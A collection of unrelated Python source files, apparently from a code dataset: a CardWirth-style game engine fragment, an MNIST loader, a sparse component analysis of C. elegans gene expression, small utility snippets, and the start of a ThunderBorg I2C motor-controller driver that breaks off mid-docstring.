def is_running(self):
"""CWPyスレッドがアクティブかどうかbool値を返す。
アクティブでない場合は、CWPyRunningErrorを投げて、
CWPyスレッドを終了させる。この挙動は正常。
"""
if not self._running:
if threading.currentThread() == self:
raise CWPyRunningError()
return self._running
def is_runningstatus(self):
return self._running
def is_playingscenario(self):
return bool(isinstance(self.sdata, cw.data.ScenarioData)\
and self.sdata.is_playing and self.ydata and self.ydata.party)
def is_runningevent(self):
return self.event.get_event() or\
self.event.get_effectevent() or\
pygame.event.peek(USEREVENT) or\
(self.is_battlestatus() and not (self.battle and self.battle.is_ready())) or\
self.is_decompressing
def is_statusbarmask(self):
return cw.cwpy.setting.statusbarmask and cw.cwpy.is_playingscenario() and \
not self.is_processing and self.ydata and self.ydata.party and not self.ydata.party.is_loading()
def is_showingdlg(self):
return 0 < self._showingdlg
def is_expanded(self):
return self.setting.is_expanded
def is_curtained(self):
return self._curtained
def is_dealing(self):
return self._dealing
def is_autospread(self):
return self._autospread
def is_gameover(self):
if self.is_playingscenario() and not self._forcegameover:
self._gameover = True
pcards = self.get_pcards("unreversed")
for pcard in pcards:
if pcard.is_alive():
self._gameover = False
break
self._gameover |= not bool(pcards)
return self._gameover
def is_forcegameover(self):
return self._forcegameover
def is_showingmessage(self):
return bool(self.get_messagewindow())
def is_showingdebugger(self):
return bool(self.frame.debugger)
def is_showingbacklog(self):
return self._is_showingbacklog
def is_debugmode(self):
return self.debug
def is_battlestatus(self):
"""現在のCWPyのステータスが、シナリオバトル中かどうか返す。
if cw.cwpy.battle:と使い分ける。
"""
return cw.cwpy.is_playingscenario() and self.status == "ScenarioBattle"
#-------------------------------------------------------------------------------
# Sprite getters
#-------------------------------------------------------------------------------
def get_inusecardimg(self):
"""InuseCardImageインスタンスを返す(使用カード)。"""
if self.inusecards:
return self.inusecards[0]
else:
return None
def get_guardcardimg(self):
"""InuseCardImageインスタンスを返す(防御・回避ボーナスカード)。"""
if self.guardcards:
return self.guardcards[0]
else:
return None
def get_messagewindow(self):
"""MessageWindow or SelectWindowインスタンスを返す。"""
sprites = self.cardgrp.get_sprites_from_layer(cw.LAYER_MESSAGE)
if sprites:
return sprites[0]
sprites = self.cardgrp.get_sprites_from_layer(cw.LAYER_SPMESSAGE)
if sprites:
return sprites[0]
return None
def get_mcards(self, mode="", flag=""):
"""MenuCardインスタンスのリストを返す。
mode: "visible" or "invisible" or "visiblemenucards" or "flagtrue"
"""
if mode == "visible":
mcards = [m for m in self.get_mcards(flag=flag) if not m.status == "hidden"]
elif mode == "invisible":
mcards = [m for m in self.get_mcards(flag=flag) if m.status == "hidden"]
elif mode == "visiblemenucards":
mcards = [m for m in self.get_mcards(flag=flag) if not m.status == "hidden"
and isinstance(m, cw.sprite.card.MenuCard)]
elif mode == "flagtrue":
mcards = [m for m in self.get_mcards(flag=flag)
if not isinstance(m, cw.character.Friend)
and m.is_flagtrue()]
elif flag:
mcards = self._mcardtable.get(flag, [])
else:
mcards = self.mcards
if self.is_battlestatus() and self.battle and self.battle.is_running():
# Exclude NPCs during battle actions (they may be shown temporarily)
mcards = [m for m in mcards
if not isinstance(m, (cw.character.Friend, cw.sprite.background.InuseCardImage))]
else:
mcards = [m for m in mcards
if not isinstance(m, cw.sprite.background.InuseCardImage)]
return mcards
def get_ecards(self, mode=""):
"""現在表示中のEnemyCardインスタンスのリストを返す。
mode: "unreversed" or "active"
"""
if not self.is_battlestatus():
return []
ecards = self.get_mcards("visible")
if mode == "unreversed":
ecards = [ecard for ecard in ecards if not ecard.is_reversed()]
elif mode == "active":
ecards = [ecard for ecard in ecards if ecard.is_active()]
ecards = filter(lambda ecard: isinstance(ecard, cw.character.Enemy), ecards)
return ecards
def get_pcards(self, mode=""):
"""PlayerCardインスタンスのリストを返す。
mode: "unreversed" or "active"
"""
if mode == "unreversed":
pcards = [pcard for pcard in self.get_pcards() if not pcard.is_reversed()]
elif mode == "active":
pcards = [pcard for pcard in self.get_pcards() if pcard.is_active()]
else:
pcards = self.pcards
pcards = [m for m in pcards
if not isinstance(m, (cw.character.Friend, cw.sprite.background.InuseCardImage))]
return pcards
def get_fcards(self, mode=""):
"""FriendCardインスタンスのリストを返す。
シナリオプレイ中以外は空のリストを返す。
mode: "unreversed" or "active"
"""
if not self.is_playingscenario():
return []
fcards = self.sdata.friendcards
if mode == "unreversed":
fcards = [fcard for fcard in fcards if not fcard.is_reversed()]
elif mode == "active":
fcards = [fcard for fcard in fcards if fcard.is_active()]
return fcards
_mutex_postevent = threading.Lock()
@synclock(_mutex_postevent)
def post_pygameevent(event):
"""pygameイベントをキューへ投入する。
投入に失敗した場合は一度だけ入力イベントを
クリアしてからの再投入を試みる。
"""
try:
pygame.event.post(event)
except:
# Clear the input events if the queue is congested
cw.cwpy.clear_inputevents()
pygame.event.post(event)
class ShowMenuCards(object):
def __init__(self, cwpy):
self.cwpy = cwpy
self.rect = pygame.Rect(cw.s((0, 0)), cw.s(cw.SIZE_AREA))
def lclick_event(self):
cw.cwpy.wait_showcards = False
def rclick_event(self):
cw.cwpy.wait_showcards = False
def main():
pass
if __name__ == "__main__":
main()
|
python
|
import os
import sys
# Extend the import path before importing project modules
sys.path.append('..')
sys.path.append('../..')
import torch
import torchvision
from torchvision import transforms, datasets
from lib.config.config import cfg, pth
dataset_save_pth = pth.DATA_DIR
# Prepare the transform for loading image files (channels x H x W)
transform = transforms.Compose([
transforms.ToTensor()
])
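# ToTensor converts HxWxC uint8 images in [0, 255] to CxHxW float tensors in [0.0, 1.0].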
# Fetch the datasets
train_val = datasets.MNIST(
root=dataset_save_pth,
train=True,
download=True,
transform=transform
)
test = datasets.MNIST(
root=dataset_save_pth,
train=False,
download=True,
transform=transform
)
# train : val = 80% : 20%
n_train = int(len(train_val) * 0.8)
n_val = len(train_val) - n_train
# Randomly split the data
train, val = torch.utils.data.random_split(train_val, [n_train, n_val])
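# A minimal follow-up sketch (not part of the original script) showing how
# these splits are typically consumed; batch_size=64 is an arbitrary
# illustrative choice.
train_loader = torch.utils.data.DataLoader(train, batch_size=64, shuffle=True)
val_loader = torch.utils.data.DataLoader(val, batch_size=64, shuffle=False)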
|
python
|
from decimal import Decimal
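# Convert the fractional part of a binary number to decimal using exact
# Decimal arithmetic. Digit i at position c contributes i * 2**c for
# c = -1, -2, ...; e.g. entering "0.101" prints 0.625.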
while True:
a = input('Number: ').replace('0.', '')
b = Decimal('0')
for i, c in zip(a, range(-1, -1 - len(a), -1)):
b += Decimal(str(i)) * Decimal('2') ** Decimal(str(c))
print(b)
|
python
|
class Color:
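# NOTE: these tuples appear to be in BGR order (the OpenCV convention):
# e.g. RED = (0, 0, 255) reads as red when interpreted as (B, G, R).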
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
LIGHT_GRAY = (200, 200, 200)
GRAY = (127, 127, 127)
DARK_GRAY = (50, 50, 50)
RED = (0, 0, 255)
GREEN = (0, 255, 0)
BLUE = (255, 0, 0)
YELLOW = (0, 255, 255)
CYAN = (255, 255, 0)
MAGENTA = (255, 0, 255)
|
python
|
#%%
import os
import pickle
import time
from pathlib import Path
import colorcet as cc
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from sklearn.decomposition import PCA
from sklearn.feature_selection import VarianceThreshold
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from graspologic.plot import pairplot
from sparse_decomposition import SparseComponentAnalysis
from sparse_decomposition.utils import calculate_explained_variance_ratio
from sparse_new_basis.data import load_scRNAseq
from sparse_new_basis.plot import savefig, set_theme
set_theme()
fig_dir = Path("sparse_new_basis/results/gene_sca_examine_components_1.0")
def stashfig(name, *args, **kwargs):
savefig(fig_dir, name, *args, **kwargs)
#%%
output_dir = Path("sparse_new_basis/experiments/genes/outputs")
var_thresh = 0.01
train_size = 2 ** 14
n_components = 20
max_iter = 20
with_mean = True
with_std = True
seed = 8888
global_params = (
f"var_thresh={var_thresh}-train_size={train_size}-n_components={n_components}"
f"-max_iter={max_iter}-with_std={with_std}-seed={seed}"
)
output_dir = output_dir / global_params
if not os.path.isdir(output_dir):
print(f"{output_dir} is not a directory... creating.")
os.mkdir(output_dir)
os.mkdir(output_dir / "data")
os.mkdir(output_dir / "models")
#%%
sequencing_df, annotation_df = load_scRNAseq(fillna=True)
#%% throw out some genes with low variance
X = sequencing_df.values.copy()
var_thresh = VarianceThreshold(threshold=var_thresh)
X = var_thresh.fit_transform(X)
gene_index = sequencing_df.columns
original_n_genes = len(gene_index)
gene_index = gene_index[var_thresh.get_support()]
sequencing_df = sequencing_df[gene_index]
new_n_genes = len(gene_index)
print(
f"Number of genes removed: {original_n_genes - new_n_genes} "
f"out of {original_n_genes}"
)
#%%
np.random.seed(seed)
neuron_index = sequencing_df.index
y = sequencing_df.index.get_level_values(level="Neuron_type").values
# stratify=y will try to set the distribution of class labels the same for train/test
X_train, X_test, index_train, index_test = train_test_split(
X, neuron_index, stratify=y, train_size=train_size
)
with open(output_dir / Path("data") / "sequencing_df.pkl", "wb") as f:
pickle.dump(sequencing_df, f)
with open(output_dir / Path("data") / "index_train.pkl", "wb") as f:
pickle.dump(index_train, f)
with open(output_dir / Path("data") / "index_test.pkl", "wb") as f:
pickle.dump(index_test, f)
#%% center and scale training data
currtime = time.time()
scaler = StandardScaler(with_mean=with_mean, with_std=with_std, copy=False)
X_train = scaler.fit_transform(X_train)
print(f"{time.time() - currtime:.3f} elapsed to scale and center data.")
with open(output_dir / Path("models") / "scaler.pkl", "wb") as f:
pickle.dump(scaler, f)
#%%
np.random.seed(seed)
currtime = time.time()
pca = PCA(n_components=n_components)
X_pca = pca.fit_transform(X_train)
print(f"{time.time() - currtime:.3f} elapsed to fit PCA model.")
#%%
np.random.seed(seed)
gammas = [
# np.inf
n_components,
# 100,
# 250,
# 500,
# int(np.sqrt(X_train.shape[1]) * n_components),
# np.inf,
]
gammas = [float(g) for g in gammas]
models_by_gamma = {}
Xs_by_gamma = {}
for i, gamma in enumerate(gammas):
print(f"Gamma = {gamma}...")
if gamma == np.inf:
_max_iter = 0
else:
_max_iter = max_iter
currtime = time.time()
sca = SparseComponentAnalysis(
n_components=n_components, max_iter=_max_iter, gamma=gamma
)
X_sca = sca.fit_transform(X_train)
print(f"{time.time() - currtime:.3f} elapsed.")
models_by_gamma[gamma] = sca
Xs_by_gamma[gamma] = X_sca
model_name = f"sca_gamma={gamma}"
# with open(output_dir / Path("models") / f"{model_name}.pkl", "wb") as f:
# pickle.dump(sca, f)
# print()
#%%
# gamma = 20.0
# with open(output_dir / Path("models") / f"sca_gamma={gamma}.pkl", "rb") as f:
# sca = pickle.load(f)
#%%
rows = []
for gamma, model in models_by_gamma.items():
explained_variance_ratio = model.explained_variance_ratio_
for k, ev in enumerate(explained_variance_ratio):
n_nonzero = np.count_nonzero(model.components_[: k + 1])
rows.append(
{
"gamma": gamma,
"explained_variance": ev,
"n_components": k + 1,
"n_nonzero": n_nonzero,
}
)
scree_df = pd.DataFrame(rows)
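# Quick inspection (added): the cumulative explained variance at the final
# component for each gamma.
print(scree_df.groupby("gamma").tail(1))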
#%% palette
# palette = dict(zip(gammas, sns.color_palette("deep", 10)))
# blue_shades = sns.color_palette("Blues", n_colors=len(gammas))[1:]
# palette = dict(zip(gammas[:-1], blue_shades))
# red_shades = sns.color_palette("Reds", n_colors=len(gammas))[1:]
# palette[np.inf] = red_shades[-1]
#%%
# fig, ax = plt.subplots(1, 1, figsize=(8, 4))
# sns.lineplot(
# data=scree_df,
# x="n_components",
# y="explained_variance",
# hue="gamma",
# ax=ax,
# marker="o",
# palette=palette,
# )
# ax.get_legend().remove()
# ax.legend(bbox_to_anchor=(1, 1), loc="upper left", title="Gamma")
# # ax.legend().set_title("Gamma")
# ax.set(ylabel="Cumulative explained variance", xlabel="# of PCs")
# ax.yaxis.set_major_locator(plt.MaxNLocator(3))
# ax.xaxis.set_major_locator(plt.IndexLocator(base=5, offset=-1))
# stashfig("screeplot")
#%%
# fig, ax = plt.subplots(1, 1, figsize=(8, 4))
# sns.lineplot(
# data=scree_df,
# x="n_nonzero",
# y="explained_variance",
# hue="gamma",
# ax=ax,
# marker="o",
# palette=palette,
# )
# ax.get_legend().remove()
# ax.legend(bbox_to_anchor=(1, 1), loc="upper left", title="Gamma")
# # ax.legend().set_title("Gamma")
# ax.set(ylabel="Cumulative explained variance", xlabel="# nonzero elements")
# plt.xscale("log")
# ax.yaxis.set_major_locator(plt.MaxNLocator(3))
# # ax.xaxis.set_major_locator(plt.IndexLocator(base=5, offset=-1))
# stashfig("screeplot-by-params")
#%%
neuron_types = index_train.get_level_values("Neuron_type").values
neuron_type_palette = dict(zip(np.unique(neuron_types), cc.glasbey_light))
n_show = 5
# def make_plot_df(X, labels=None):
# columns = [f"Dimension {i+1}" for i in range(X.shape[1])]
# plot_df = pd.DataFrame(data=X, columns=columns)
# if labels is not None:
# plot_df["labels"] = labels
# return plot_df
# pg = sns.PairGrid(
# data=make_plot_df(X_pca[:, :n_show], neuron_types),
# hue="labels",
# palette=neuron_type_palette,
# corner=True,
# )
# pg.map_lower(sns.scatterplot, alpha=0.7, linewidth=0, s=10)
# pg.set(xticks=[], yticks=[])
# pg.fig.suptitle("PCA")
# axes = pg.axes
# fig = pg.fig
# gs = fig._gridspecs[0]
# for i in range(len(axes)):
# axes[i, i].remove()
# axes[i, i] = None
# ax = fig.add_subplot(gs[i, i])
# axes[i, i] = ax
# ax.axis("off")
# p_nonzero = np.count_nonzero(X_pca[:, i]) / len(X_pca)
# text = f"{p_nonzero:.2f}"
# if i == 0:
# text = "Proportion\nnonzero:\n" + text
# ax.text(0.5, 0.5, text, ha="center", va="center")
# stashfig("pairplot-pca-celegans-genes")
#%%
# X_sca = Xs_by_gamma[20]
# pg = sns.PairGrid(
# data=make_plot_df(X_sca[:, :n_show], neuron_types),
# hue="labels",
# palette=neuron_type_palette,
# corner=True,
# )
# # hide_indices = np.tril_indices_from(axes, 1)
# # for i, j in zip(*hide_indices):
# # axes[i, j].remove()
# # axes[i, j] = None
# pg.map_lower(sns.scatterplot, alpha=0.7, linewidth=0, s=10)
# pg.set(xticks=[], yticks=[])
# pg.fig.suptitle("SCA")
# axes = pg.axes
# fig = pg.fig
# gs = fig._gridspecs[0]
# for i in range(len(axes)):
# axes[i, i].remove()
# axes[i, i] = None
# ax = fig.add_subplot(gs[i, i])
# axes[i, i] = ax
# ax.axis("off")
# p_nonzero = np.count_nonzero(X_sca[:, i]) / len(X_sca)
# text = f"{p_nonzero:.2f}"
# if i == 0:
# text = "Proportion\nnonzero:\n" + text
# ax.text(0.5, 0.5, text, ha="center", va="center")
# stashfig("pairplot-sca-celegans-genes")
#%% train vs test PVE
# TODO this one not really done, not sure if worth showing
# X_test = scaler.transform(X_test)
# X_test_pca = pca.transform(X_test)
# explained_variance_pca = calculate_explained_variance_ratio(X_test, pca.components_.T)
# X_test_sca = sca.transform(X_test)
# explained_variance_sca = calculate_explained_variance_ratio(X_test, sca.components_.T)
# fig, ax = plt.subplots(1, 1, figsize=(8, 4))
# plt.plot(explained_variance_pca)
# plt.plot(explained_variance_sca)
#%%
gamma = gammas[0]
sca = models_by_gamma[gamma]
X_transformed = Xs_by_gamma[gamma]
def make_neuron_df(X_transformed):
columns = [f"component_score_{i}" for i in range(n_components)]
neuron_df = pd.DataFrame(index=index_train, data=X_transformed, columns=columns,)
# neuron_df["neuron_type"] = scrna_meta.loc[index_train, "Neuron_type"]
neuron_df = neuron_df.reset_index(level="Neuron_type")
neuron_df.rename(columns={"Neuron_type": "neuron_type"}, inplace=True)
for c in columns:
neuron_df["abs_" + c] = np.abs(neuron_df[c])
return neuron_df
def make_genes_annotations(component):
nonzero_inds = np.nonzero(component)[0]
magnitude_sort_inds = np.argsort(np.abs(component[nonzero_inds]))[::-1]
nonzero_inds = nonzero_inds[magnitude_sort_inds]
select_gene_names = gene_index[nonzero_inds].copy()
select_genes = pd.DataFrame(select_gene_names)
select_gene_names = select_gene_names.values
# select_genes = gene_df.loc[select_gene_index].copy()
select_genes["component_val"] = component[nonzero_inds]
select_genes["component_ind"] = nonzero_inds
select_genes = select_genes.set_index("genes")
# select_gene_names = select_genes["gene_symbol"]
select_annotation_genes = annotation_df[
annotation_df["gene"].isin(select_gene_names)
]
# select_genes = select_genes.reset_index().set_index("gene_symbol")
select_genes["cell_annotations"] = ""
for _, row in select_annotation_genes.iterrows():
select_genes.loc[row["gene"], "cell_annotations"] += (
str(row["neuron_class"]) + ","
)
return select_genes
#%%
neuron_df = make_neuron_df(X_transformed)
for i in range(n_components):
component = sca.components_[i].copy()
sign = np.sign(np.max(component[np.nonzero(component)]))
component *= sign # flip to positive at least for plotting
select_genes = make_genes_annotations(component)
# also flip the scores for plotting
# select_genes["component_val"] = select_genes["component_val"] * sign
neuron_df[f"component_score_{i}"] *= sign
median_mags = neuron_df.groupby("neuron_type")[f"abs_component_score_{i}"].agg(
np.median
)
median_mags = median_mags.sort_values(ascending=False)
neuron_types = median_mags.index.values
fig, axs = plt.subplots(
3,
1,
figsize=(6, 8),
gridspec_kw=dict(height_ratios=[0.4, 0.2, 0.4], hspace=0.06),
)
y_max = neuron_df[f"component_score_{i}"].max()
y_min = neuron_df[f"component_score_{i}"].min()
y_range = y_max - y_min
y_max += 0.05 * y_range
y_min -= 0.05 * y_range
n_per_row = 20
row_neuron_types = neuron_types[:n_per_row]
ax = axs[0]
sns.stripplot(
data=neuron_df[neuron_df["neuron_type"].isin(row_neuron_types)],
x="neuron_type",
y=f"component_score_{i}",
hue="neuron_type",
hue_order=row_neuron_types, # ensures sorting stays the same
order=row_neuron_types, # ensures sorting stays the same
palette=neuron_type_palette,
jitter=0.35,
ax=ax,
s=3,
alpha=0.7,
)
ax.get_legend().remove()
ax.set(
xlim=(-1, n_per_row),
ylim=(y_min, y_max),
xlabel=f"Top {n_per_row} cell types",
ylabel="Score",
yticks=[0],
yticklabels=[0],
)
ax.axhline(0, color="black", linestyle=":", linewidth=1)
ax.tick_params(length=0, labelsize="xx-small")
plt.setp(
ax.get_xticklabels(),
rotation=90,
rotation_mode="anchor",
ha="right",
va="center",
)
for tick in ax.get_xticklabels():
text = tick.get_text()
tick.set_color(neuron_type_palette[text])
ax = axs[2]
plot_select_genes = select_genes.reset_index()
plot_select_genes = plot_select_genes.iloc[:n_per_row]
plot_select_genes["x"] = range(len(plot_select_genes))
sns.scatterplot(
data=plot_select_genes, x="x", y="component_val", color="black", s=30
)
ax.xaxis.set_major_locator(plt.FixedLocator(np.arange(n_per_row)))
ax.xaxis.set_major_formatter(plt.FixedFormatter(plot_select_genes["genes"].values))
ax.tick_params(length=0, labelsize="xx-small")
plt.setp(
ax.get_xticklabels(),
rotation=90,
rotation_mode="anchor",
ha="right",
va="center",
)
ax.axhline(0, color="black", linestyle=":", linewidth=1)
ax.yaxis.set_major_locator(plt.FixedLocator([0]))
ax.yaxis.set_major_formatter(plt.FixedFormatter([0]))
ax.set(
xlim=(-1, n_per_row), xlabel=f"Top {n_per_row} genes", ylabel="Loading",
)
annot_ax = axs[1]
annot_ax.set_zorder(-1)
sns.utils.despine(ax=annot_ax, left=True, bottom=True)
annot_ax.set(xlim=(-1, n_per_row), ylim=(0, 1.5), xticks=[], yticks=[], ylabel="")
y_min, y_max = ax.get_ylim()
y_range = y_max - y_min
for x, row in plot_select_genes.iterrows():
if row["cell_annotations"] != "":
cell_types = np.unique(row["cell_annotations"].split(",")[:-1])
cell_types = [
cell_type
for cell_type in cell_types
if cell_type in neuron_type_palette
]
y_last = y_min
for c, cell_type in enumerate(cell_types):
if cell_type in neuron_type_palette:
y_top = y_last + y_range / len(cell_types)
ax.fill_between(
(x - 0.5, x + 0.5),
y_last,
y_top,
color=neuron_type_palette[cell_type],
alpha=1,
zorder=-1,
facecolor="white",
)
y_last = y_top
cell_loc = np.where(row_neuron_types == cell_type)[0]
if len(cell_loc) > 0:
annot_ax.plot(
[x, cell_loc[0]],
[0.02, 1],
color=neuron_type_palette[cell_type],
)
fig.suptitle(f"Component {i + 1}", y=0.93)
stashfig(f"component_{i+1}_relationplot-gamma={int(gamma)}.png", format="png")
|
python
|
class Final(type):
    def __new__(meta, name, bases, attrs):
        # Refuse to create a class whose bases were themselves made by Final
        if any(isinstance(base, meta) for base in bases):
            raise TypeError(f"type '{name}' cannot subclass a final class")
        return super().__new__(meta, name, bases, attrs)
class Sealed(metaclass=Final): pass
class ShouldFail(Sealed): pass  # raises TypeError at class-creation time
|
python
|
"""COUNTER 5 test suite"""
|
python
|
# -*- coding: utf-8 -*-
#
# tborg/tborg.py
#
"""
The ThunderBorg API
by Carl J. Nobile
THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import absolute_import
__docformat__ = "restructuredtext en"
import io
import fcntl
import types
import time
import logging
import six
_LEVEL_TO_NAME = logging._levelNames if six.PY2 else logging._levelToName
class ThunderBorgException(Exception):
pass
class ThunderBorg(object):
"""
This module is designed to communicate with the ThunderBorg motor
controller board.
"""
#.. autoclass: tborg.ThunderBorg
# :members:
#
# sudo i2cdetect -y 1
_DEF_LOG_LEVEL = logging.WARNING
_DEVICE_PREFIX = '/dev/i2c-{}'
DEFAULT_BUS_NUM = 1 # Rev. 2 boards
"""Default I²C bus number."""
DEFAULT_I2C_ADDRESS = 0x15
"""Default I²C address of the ThunderBorg board."""
_POSSIBLE_BUSS = [0, 1]
_I2C_ID_THUNDERBORG = 0x15
_I2C_SLAVE = 0x0703
_I2C_READ_LEN = 6
_PWM_MAX = 255
_VOLTAGE_PIN_MAX = 36.3
"""Maximum voltage from the analog voltage monitoring pin"""
_VOLTAGE_PIN_CORRECTION = 0.0
"""Correction value for the analog voltage monitoring pin"""
_BATTERY_MIN_DEFAULT = 7.0
"""Default minimum battery monitoring voltage"""
_BATTERY_MAX_DEFAULT = 35.0
"""Default maximum battery monitoring voltage"""
# Commands
COMMAND_SET_LED1 = 1
"""Set the color of the ThunderBorg LED"""
COMMAND_GET_LED1 = 2
"""Get the color of the ThunderBorg LED"""
COMMAND_SET_LED2 = 3
"""Set the color of the ThunderBorg Lid LED"""
COMMAND_GET_LED2 = 4
"""Get the color of the ThunderBorg Lid LED"""
COMMAND_SET_LEDS = 5
"""Set the color of both the LEDs"""
COMMAND_SET_LED_BATT_MON = 6
"""Set the color of both LEDs to show the current battery level"""
COMMAND_GET_LED_BATT_MON = 7
"""Get the state of showing the current battery level via the LEDs"""
COMMAND_SET_A_FWD = 8
"""Set motor A PWM rate in a forwards direction"""
COMMAND_SET_A_REV = 9
"""Set motor A PWM rate in a reverse direction"""
COMMAND_GET_A = 10
"""Get motor A direction and PWM rate"""
COMMAND_SET_B_FWD = 11
"""Set motor B PWM rate in a forwards direction"""
COMMAND_SET_B_REV = 12
"""Set motor B PWM rate in a reverse direction"""
COMMAND_GET_B = 13
"""Get motor B direction and PWM rate"""
COMMAND_ALL_OFF = 14
"""Switch everything off"""
COMMAND_GET_DRIVE_A_FAULT = 15
"""
Get the drive fault flag for motor A, indicates faults such as
short-circuits and under voltage.
"""
COMMAND_GET_DRIVE_B_FAULT = 16
"""
Get the drive fault flag for motor B, indicates faults such as
short-circuits and under voltage
"""
COMMAND_SET_ALL_FWD = 17
"""Set all motors PWM rate in a forwards direction"""
COMMAND_SET_ALL_REV = 18
"""Set all motors PWM rate in a reverse direction"""
COMMAND_SET_FAILSAFE = 19
"""
Set the failsafe flag, turns the motors off if communication is
interrupted.
"""
COMMAND_GET_FAILSAFE = 20
"""Get the failsafe flag"""
COMMAND_GET_BATT_VOLT = 21
"""Get the battery voltage reading"""
COMMAND_SET_BATT_LIMITS = 22
"""Set the battery monitoring limits"""
COMMAND_GET_BATT_LIMITS = 23
"""Get the battery monitoring limits"""
COMMAND_WRITE_EXTERNAL_LED = 24
"""Write a 32bit pattern out to SK9822 / APA102C"""
COMMAND_GET_ID = 0x99
"""Get the board identifier"""
COMMAND_SET_I2C_ADD = 0xAA
"""Set a new I²C address"""
COMMAND_VALUE_FWD = 1
"""I²C value representing forward"""
COMMAND_VALUE_REV = 2
"""I²C value representing reverse"""
COMMAND_VALUE_OFF = 0
"""I²C value representing off"""
COMMAND_VALUE_ON = 1
"""I²C value representing on"""
COMMAND_ANALOG_MAX = 0x3FF
"""Maximum value for analog readings"""
def __init__(self,
bus_num=DEFAULT_BUS_NUM,
address=DEFAULT_I2C_ADDRESS,
logger_name='',
log_level=_DEF_LOG_LEVEL,
auto_set_addr=False,
static_init=False):
"""
Setup logging and initialize the ThunderBorg motor driver board.
:param bus_num: The I²C bus number, defaults to {1:d}.
:type bus_num: int
:param address: The I²C address to use, defaults to 0x{0:02X}.
:type address: int
:param logger_name: The name of the logger to log to, defaults to
the root logger.
:type logger_name: str
:param log_level: The lowest log level to log, defaults to {2:s}.
:type log_level: int
:param auto_set_addr: If set to `True` will use the first board
that is found. Default is `False`.
:type auto_set_addr: bool
:param static_init: If called by a public class method.
:type static_init: bool
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream or an
invalid address or bus was provided.
"""
# Setup logging
if logger_name == '':
logging.basicConfig()
self._log = logging.getLogger(logger_name)
self._log.setLevel(log_level)
if not static_init:
self._initialize_board(bus_num, address, auto_set_addr)
__init__.__doc__ = __init__.__doc__.format(
_I2C_ID_THUNDERBORG, DEFAULT_BUS_NUM, _LEVEL_TO_NAME[_DEF_LOG_LEVEL])
def _initialize_board(self, bus_num, address, auto_set_addr):
"""
Setup the I²C connections and file streams for read and write. If
the default board cannot be found search for a board and if
``auto_set_addr`` is ``True`` configure the found board.
"""
if not self._is_thunder_borg_board(bus_num, address, self):
err_msg = "ThunderBorg not found on bus %s at address 0x%02X"
self._log.error(err_msg, bus_num, address)
buss = [bus for bus in self._POSSIBLE_BUSS
if not auto_set_addr and bus != bus_num]
found_chip = False
for bus in buss:
found_chip = self._is_thunder_borg_board(bus, address, self)
if not found_chip:
self._log.error(err_msg, bus, address)
if (not found_chip
and (not auto_set_addr or
(auto_set_addr
and not self._auto_set_address(bus_num, self)))):
msg = ("ThunderBorg could not be found; is it properly "
"attached, the correct address used, and the I2C "
"driver module loaded?")
self._log.critical(msg)
raise ThunderBorgException(msg)
#
# Class Methods
#
@classmethod
def _is_thunder_borg_board(cls, bus_num, address, tb):
"""
Try to initialize a board on a given bus and address.
"""
tb._log.debug("Loading ThunderBorg on bus number %d, address 0x%02X",
cls.DEFAULT_BUS_NUM, address)
found_chip = False
if cls._init_bus(bus_num, address, tb):
try:
recv = tb._read(cls.COMMAND_GET_ID, cls._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
tb.close_streams()
tb._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e:
pass
else:
found_chip = cls._check_board_chip(recv, bus_num, address, tb)
return found_chip
@classmethod
def _init_bus(cls, bus_num, address, tb):
"""
Check that the bus exists then initialize the board on the given
address.
"""
device_found = False
device = cls._DEVICE_PREFIX.format(bus_num)
try:
tb._i2c_read = io.open(device, mode='rb', buffering=0)
tb._i2c_write = io.open(device, mode='wb', buffering=0)
except (IOError, OSError) as e: # pragma: no cover
tb.close_streams()
msg = ("Could not open read or write stream on bus {:d} at "
"address 0x{:02X}, {}").format(bus_num, address, e)
tb._log.critical(msg)
else:
try:
fcntl.ioctl(tb._i2c_read, cls._I2C_SLAVE, address)
fcntl.ioctl(tb._i2c_write, cls._I2C_SLAVE, address)
except (IOError, OSError) as e: # pragma: no cover
tb.close_streams()
msg = ("Failed to initialize ThunderBorg on bus number {:d}, "
"address 0x{:02X}, {}").format(bus_num, address, e)
tb._log.critical(msg)
else:
device_found = True
return device_found
@classmethod
def _check_board_chip(cls, recv, bus_num, address, tb):
found_chip = False
length = len(recv)
if length == cls._I2C_READ_LEN:
if recv[1] == cls._I2C_ID_THUNDERBORG:
found_chip = True
msg = "Found ThunderBorg on bus '%d' at address 0x%02X."
tb._log.info(msg, bus_num, address)
else:
msg = ("Found a device at 0x%02X on bus number %d, but it is "
"not a ThunderBorg (ID 0x%02X instead of 0x%02X).")
tb._log.info(msg, address, bus_num, recv[1],
cls._I2C_ID_THUNDERBORG)
else: # pragma: no cover
msg = ("Wrong number of bytes received, found '%d', should be "
"'%d' at address 0x%02X.")
tb._log.error(msg, length, cls._I2C_READ_LEN, address)
return found_chip
@classmethod
def _auto_set_address(cls, bus_num, tb):
found_chip = False
boards = cls.find_board(tb=tb, close=False)
msg = "Found ThunderBorg(s) on bus '%d' at address %s."
hex_boards = ', '.join(['0x%02X' % b for b in boards])
tb._log.warning(msg, bus_num, hex_boards)
if boards:
found_chip = cls._is_thunder_borg_board(bus_num, boards[0], tb)
return found_chip
@classmethod
def find_board(cls, bus_num=DEFAULT_BUS_NUM, tb=None, close=True,
logger_name=''):
"""
Scans the I²C bus for ThunderBorg boards and returns a list of
all usable addresses.
.. note::
Rev 1 boards use bus number 0 and rev 2 boards use bus number 1.
:param bus_num: The bus number where the address will be scanned.
Default bus number is 1.
:type bus_num: int
:param tb: Use a pre-existing ThunderBorg instance. Default is `None`.
:type tb: ThunderBorg instance
:param close: Default is `True` to close the stream before exiting.
:type close: bool
:raises KeyboardInterrupt: Keyboard interrupt.
